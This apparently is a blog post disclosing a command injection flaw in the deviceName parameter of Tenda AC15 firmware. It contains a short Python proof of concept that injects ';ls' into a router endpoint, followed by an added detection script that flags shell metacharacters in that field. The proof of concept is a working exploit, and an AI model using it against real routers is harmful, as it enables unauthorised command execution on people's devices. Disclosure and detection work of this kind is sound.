Tenda AC15 has a vulnerability

In Tenda AC15 firmware V15.03.05.18, we discovered a command injection vulnerability in the deviceName parameter: the Var variable is passed directly to the doSystemCmd function, which leads to arbitrary command execution. A user-supplied deviceName value can trigger this vulnerability.

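import requests

# Address of the target router
ip = "192.168.107.156"
url = "http://" + ip + "/goform/setUsbUnload"
# deviceName value: a shell metacharacter followed by a command
payload = ";ls"

# Send the value as a form-encoded POST parameter and print the reply
data = {"deviceName": payload}
response = requests.post(url, data=data)
print(response.text)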
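
For detection at a reverse proxy or in HTTP logs, the following added example (not part of the original post) flags POST requests to /goform/setUsbUnload whose deviceName value is not a plain device name. The allowlist pattern for legitimate values, the function names and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/goform/setUsbUnload"   # path taken from the PoC on this page
PARAM = "deviceName"                # injectable parameter named on this page
# Assumption: legitimate values are short device-style names such as "sda1".
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]{1,32}")
# Characters a shell treats specially; reported to explain why a value was flagged.
SHELL_META = set(";|&`$()<>\n\r\\'\"")


def inspect_request(method, target, body):
    """Return a list of findings for one HTTP request (empty list = clean)."""
    if method.upper() != "POST" or urlsplit(target).path != ENDPOINT:
        return []
    # parse_qs percent-decodes, so "%3Bls" is examined as ";ls".
    fields = parse_qs(body, keep_blank_values=True)
    findings = []
    for value in fields.get(PARAM, []):  # check every copy of a repeated parameter
        if SAFE_VALUE.fullmatch(value):
            continue
        meta = sorted(SHELL_META.intersection(value))
        findings.append({"value": value, "shell_meta": meta})
    return findings


# Constructed sample requests (method, request target, form body); not captured traffic.
SAMPLES = [
    ("POST", "/goform/setUsbUnload", "deviceName=sda1"),
    ("POST", "/goform/setUsbUnload", "deviceName=%3Bls"),
    ("POST", "/goform/setUsbUnload", "deviceName=sda1&deviceName=a%7Cb"),
    ("GET", "/goform/setUsbUnload", ""),
    ("POST", "/goform/other", "deviceName=%3Bls"),
]


def scan(samples):
    """Map sample index -> findings for the requests that were flagged."""
    hits = {}
    for i, (method, target, body) in enumerate(samples):
        found = inspect_request(method, target, body)
        if found:
            hits[i] = found
    return hits


if __name__ == "__main__":
    for idx, found in scan(SAMPLES).items():
        print(idx, found)
```

The check is an allowlist rather than a blocklist, so values with spaces or other unexpected characters are flagged even when no listed metacharacter is present.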
posted @ 2024-09-15 22:17  Amalll